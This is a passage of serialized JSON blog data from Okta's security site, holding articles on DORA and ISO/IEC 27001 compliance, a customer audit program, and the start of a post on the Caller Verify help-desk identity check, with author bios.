\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Lastly, this section proactively maps the DORA domains and applicable DORA Articles with corresponding Okta Control Library Supporting Information for easy reference. Okta’s Control Library supports customers with a comprehensive collection of security controls adopted by our organization to protect systems and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on Compliance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As highlighted in our DORA Compliance with Okta Factsheet, Okta upholds a strong compliance framework to demonstrate our commitment to maintaining highly available, secure and resilient products and services - many of the DORA requirements are business as usual.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A key component of our methodical customer support is making the information they require readily available. We publish our latest independent audit reports and other related documents on the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and all available documentation is accessible to customers and prospects of Okta. Site visitors can view Okta’s certifications and access industry-standard questionnaires. To learn more about our efforts, read our blog article, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Empowering Security with Customer Trust Solutions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Keep watching as we publish additional helpful resources; more to come.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Disclaimer: \",\"marks\":[{\"type\":\"italic\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"While this article discusses certain legal concepts, it does not constitute legal advice. It is provided for informational purposes only. For legal advice regarding your organization's compliance needs, please consult your organization's legal department. Okta makes no representations, warranties, or other assurances regarding the content of this article. Information regarding Okta's contractual assurances to its customers can be found at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://okta.com/agreements\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta.com/agreements\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"This blog article provides a brief overview of the DORA regulation, outlines how Okta can support compliance adherence, and introduces our new Factsheet, a helpful resource for satisfying DORA's regulated requirements."},"updatedAt":"2025-06-19T20:58:42.206Z","secAuthor":[{"id":"9b70b212-4a99-533c-89ce-b03712fa8a5e","bio":{"bio":"Aimi Mcilwraith is a Senior Security Analyst at Okta. The Customer Assurance team within Security Trust & Culture supports Okta’s growing customer base with inquiries pertaining to security and compliance. Backed by over a decade of Security experience working in public and private sector organizations, Aimi has honed a deep understanding of security practices and risk management. CCSK and NIST CSF-certified, she leverages her knowledge and commitment to excellence in safeguarding digital environments to support customers globally from the EMEA region. In her downtime, Aimi enjoys reading and attending concerts.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png"},"name":" Aimi Mcilwraith","jobTitle":"Senior Security Analyst","slug":"/hackers/aimi-mcilwraith","node_locale":"en"}]},{"slug":"/articles/2025/05/enhancing-customer-trust-through-a-comprehensive-audit-program","id":"254b847f-f0eb-554a-b8d4-6958644d5e74","title":"Enhancing Customer Trust Through a Comprehensive Audit Program","date":"2025-05-14T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is the third iteration in our blog series. In our \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2024/09/unveiling-essence-security-customer-trust/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"first blog\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we introduced Okta’s Security Customer Trust team, highlighting our commitment to transparency and our mission to strengthen security outcomes for Okta and the communities we serve. In the \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"second blog\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we took a closer look at the tools and solutions that power our Customer Trust efforts.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this blog, we’ll explore how the Okta Security Customer Audit further enhances the Customer Trust function, driving even greater transparency and confidence in our security practices to meet our customers' regulatory and compliance requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The many benefits of Cloud computing come with the challenge of having reduced visibility into the day-to-day operations of the growing number of applications in today’s tech stacks. The adoption of the identity is the cornerstone of a security program and the new perimeter of technology itself.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For most customers, reviewing Okta’s generally available documentation meets their requirements. For highly regulated customers, a more detailed audit and more robust documentation may be necessary.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Introducing the program\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As organizations increasingly rely on identity platforms, the need for comprehensive security measures has never been greater. The growing dependence on external vendors, suppliers, and service providers means businesses face a diverse set of supply chain risks that must be carefully managed to maintain a strong security posture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Security Customer Audit program enables highly regulated customers to view the policies, procedures, and evidence that Okta provides to its auditors and meet regulatory requirements for observing control implementation evidence. Our program is carefully designed to enable audits to occur in a way that ensures equality and that does not expose customers to undue risk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Working with us\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Through structured assessments, our program provides deep visibility into Okta’s enterprise operations, covering critical areas such as quality control, regulatory compliance, security measures, and performance metrics. These audits are designed to give customers the confidence that Okta’s security practices not only meet, but often exceed, industry standards, empowering them to meet their own regulatory and compliance requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During an Okta Security Customer Audit, you can expect:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Before an Audit\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our team will execute a thorough review of the Okta processes, documentation, and controls. This may include interviews with key personnel, examination of various records, and observation of operational practices. Our audit team possesses expertise in relevant areas such as quality assurance, compliance, and information security across various industries and regions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During an Audit, Pooled edition\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Following the methodical mapping of regulatory controls, we introduced our program's capabilities to a pooled audit function. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last December, we piloted our Okta Security Pooled Audit program \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"(more on this in a future blog)\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", which addressed the control requirements defined by the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/05/a-guide-to-dora-compliance-with-okta/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Operational Resiliency Act (DORA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Our pooled audit resulted in equipping dozens of our EMEA/UK financial services customers with an open-door look into our security program, much like we would share with our own third-party audit functions. Ultimately, we demonstrated the Okta controls meeting customer and regulator requirements, in addition to fostering community. Our attendees had peer-to-peer opportunities to discuss similar industry-related challenges they face in their respective organizations regarding compliance regulations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After the Audit\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Post-audit closing activities are crucial for the program's effectiveness. These activities involve following up on the implementation of corrective actions and verifying that Okta has made the necessary improvements to keep both Okta and our customers secure. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on our Audit programs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While we’re not subjected to every global regulation, we will work closely with our customers to understand their requirements, support them in their efforts to achieve and maintain compliance, and reinforce trust in Okta. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Later this month, we’re expanding our pooled audit program to help Okta’s Australian customers address new regulations under Australian Prudential Regulatory Authority (APRA) CPS 230, and the existing CPS 234 requirements, which will follow the same program structure. To learn more about our audit programs and how to get involved, contact your account team.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"This is the third iteration in our blog series. This blog article explores how the Okta Security Customer Audit further enhances the Customer Trust function, driving even greater transparency and confidence in our security practices to meet our customers' regulatory and compliance requirements."},"updatedAt":"2025-06-19T20:56:29.667Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"},{"id":"06b9e469-2cb0-5dc7-a6c5-e46c9a367857","bio":{"bio":"Matthew Hansen is a Regional CSO for Okta’s Americas West region. As a leader in security risk management, his accolades include MBA, CISA, and CCSK. Backed by over 15 years of experience in consulting, internal audit, IT governance and risk management, Matthew provides security program support to Okta’s customers. During his downtime, he enjoys travelling the world, experiencing new cultures, and attending Formula 1 races.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg"},"name":"Matthew Hansen","jobTitle":"Regional CSO, Americas West","slug":"/hackers/matthew-hansen","node_locale":"en"}]},{"slug":"/articles/2025/06/enabling-iso27001-compliance-with-okta","id":"4b12c067-3a67-5b26-977f-f9bb9a0a0611","title":"Enabling ISO/IEC 27001:2022 Compliance with Okta","date":"2025-06-04T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001 continues to be a globally recognized security standard and a consistently popular choice for today’s organizations seeking to demonstrate robust security controls and the effectiveness of their Information Security Management Systems (ISMS). This blog introduces a new Factsheet that provides guidance on how Okta can support organizations of any size in achieving or maintaining compliance to the ISO/IEC 27001:2022 standard.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is ISO/IEC 27001:2022?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001 is an international standard for information security management. It provides a framework for organizations to follow to establish, implement, monitor, and maintain an effective Information Security Management System (ISMS). The standard consists of security controls, which are divided into groups of:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizational, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"People,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Physical, and \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technological controls.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The 2022 iteration of the standard introduced “Operational Capabilities” such as Identity and Access Management (IAM). By implementing applicable IAM controls in an organization’s environment, it can be demonstrated that best practices are being followed for securing information, data, and assets.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta supports compliance to ISO/IEC 27001:2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Auth0 are ISO27001:2022-compliant. Our platforms can also support organizations in achieving or maintaining their compliance to the ISO/IEC 27001:2022 standard. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To guide our customers on how Okta can support, we’ve recently released a helpful new resource: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/?itemUid=6217dabc-952b-4163-b19b-8372a8de7d4d&source=click\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ISO/IEC 27001:2022 Compliance with Okta Platform Factsheet\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". This Factsheet provides an overview of ISO27001’s benefits and a detailed summary of how Okta’s products provide a unified approach in compliance adherence to IAM-specific and other controls. Keeping our customers in mind, we’ve methodically documented our guidance in three key sections:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta Supports IAM Controls\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta Supports Non-IAM Specific Controls\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001:2022 Reporting Requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Each section is strategically mapped to Okta products that support adhering to the controls, as presented. Leveraging the control guidance of the Factsheet can benefit all Okta customers, even organizations not currently targeting adherence to these controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on Compliance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta upholds a strong compliance framework to demonstrate our commitment to maintaining highly available, secure, and resilient products and services. Many of these controls are embedded in Okta’s business-as-usual activities. We invite you to visit our new Factsheet, as well as our latest independent audit reports and other security compliance-related documents on our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and all available documentation is accessible to customers and prospects of Okta. Site visitors can view Okta’s certifications and access industry-standard questionnaires. To learn more about our efforts, read our blog article, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Empowering Security with Customer Trust Solutions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Keep watching as we publish additional helpful resources; more to come.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Disclaimer: While this article discusses certain legal concepts, it does not constitute legal advice. It is provided for informational purposes only. For legal advice regarding your organization's compliance needs, please consult your organization's legal department. Okta makes no representations, warranties, or other assurances regarding the content of this article. Information regarding Okta's contractual assurances to its customers can be found at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://okta.com/agreements\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta.com/agreements\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"ISO/IEC 27001 is a globally recognized security standard. This blog introduces a new Factsheet that provides guidance on how Okta can support organizations of any size in achieving or maintaining compliance to the ISO/IEC 27001:2022 standard."},"updatedAt":"2025-06-19T20:55:40.460Z","secAuthor":[{"id":"5d49800b-59a6-5c33-b25f-79ad8ce4b228","bio":{"bio":"Gemma Parkes is a Security Assurance Analyst in the EMEA region at Okta. The Customer Assurance team within Security Trust & Culture supports Okta’s growing customer base with inquiries pertaining to security and compliance. Working within the defence and aerospace industry, then moving to global corporations supporting public and private sector customers, Gemma has gained extensive experience in implementing and managing security frameworks and associated security practices. Backed by over 20 years of experience in security governance, risk management, and compliance, she now enjoys working collaboratively to provide strategic support to Okta’s customers and prospects. In her downtime, Gemma enjoys spending time with her family and going to the theatre.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg"},"name":"Gemma Parkes","jobTitle":"Security Assurance Analyst","slug":"/hackers/gemma-parkes","node_locale":"en"}]},{"slug":"/articles/2025/06/building-confidence-in-support-comms-with-caller-verify-at-okta","id":"3e590ecf-3c74-5381-9fad-40076025fca0","title":"Building Confidence in Support Comms with Caller Verify at Okta","date":"2025-06-18T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In many of the most impactful incidents of the past two years, attackers gained privileged access to systems by tricking IT support personnel into resetting the passwords and MFA factors of system administrators.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Armed with access to privileged accounts, attackers were able to expand their access further by accessing directories of hashed passwords (NTDS.dit) stored in every Microsoft Active Directory environment. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In most organizations, the challenge is how to validate the identity of callers to internal help desks or other technical teams before performing user lifecycle events. The days when the name of your childhood best friend or your first car model provided enough assurance to validate your identity are long gone.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"So, when an employee does call for help, how do technical support personnel validate with confidence that the caller on the line is who they say they are? These processes need to be revisited, especially given recent advances in “deepfake” technology.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"That’s where Caller Verify can help.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What is Caller Verify?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.callerverify.com/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Caller Verify\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" is an application that enables IT support to extend the multi-factor authentication prompts available via Okta Verify to quickly and securely verify the identity of inbound callers. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify is a third-party developed application awarded Okta’s \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/2024/10/okta-partner-awards-celebrating-our-2024-partner-award-winners/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"\\\"2024 AMER Rising Star Partner of the Year” winner\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". It can integrate with ITSM and CRM solutions, such as ServiceNow or Salesforce, to require that all inbound callers satisfy an MFA challenge before a support ticket is unlocked for use.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify is compliant with the following regulations:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.osfi-bsif.gc.ca/en/guidance/guidance-library/technology-cyber-risk-management\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Office of the Superintendent of Financial Institutions (OSFI) Guideline B-13 Technology and Cyber Risk Management\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", subsection 3.2.7 Defend\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.hhs.gov/hipaa/for-professionals/privacy/laws-regulations/index.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Health Insurance Portability and Accountability (HIPAA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" Security Rule, 45 CFR § 164.308(a)(1)(ii)(D)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.pcisecuritystandards.org/standards/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Payment Card Industry Data Security Standard (PCI DSS)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Requirement 7.1\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://gdpr-info.eu/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"General Data Protection Regulation (GDPR)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Article 32\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63-3.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"National Institute of Standards and Technology (NIST)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Level 3\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This solution allows Okta IT admins to enhance our employee experience with a timely response to confident, authenticated communications. By sending a prompt to the caller using Okta Verify, the technical support team can validate the caller’s identity before providing any level of assistance, protecting both the organization and the user.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta’s Use Case\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta integrated Caller Verify into various IT support processes well over 12 months ago. Our use of Caller 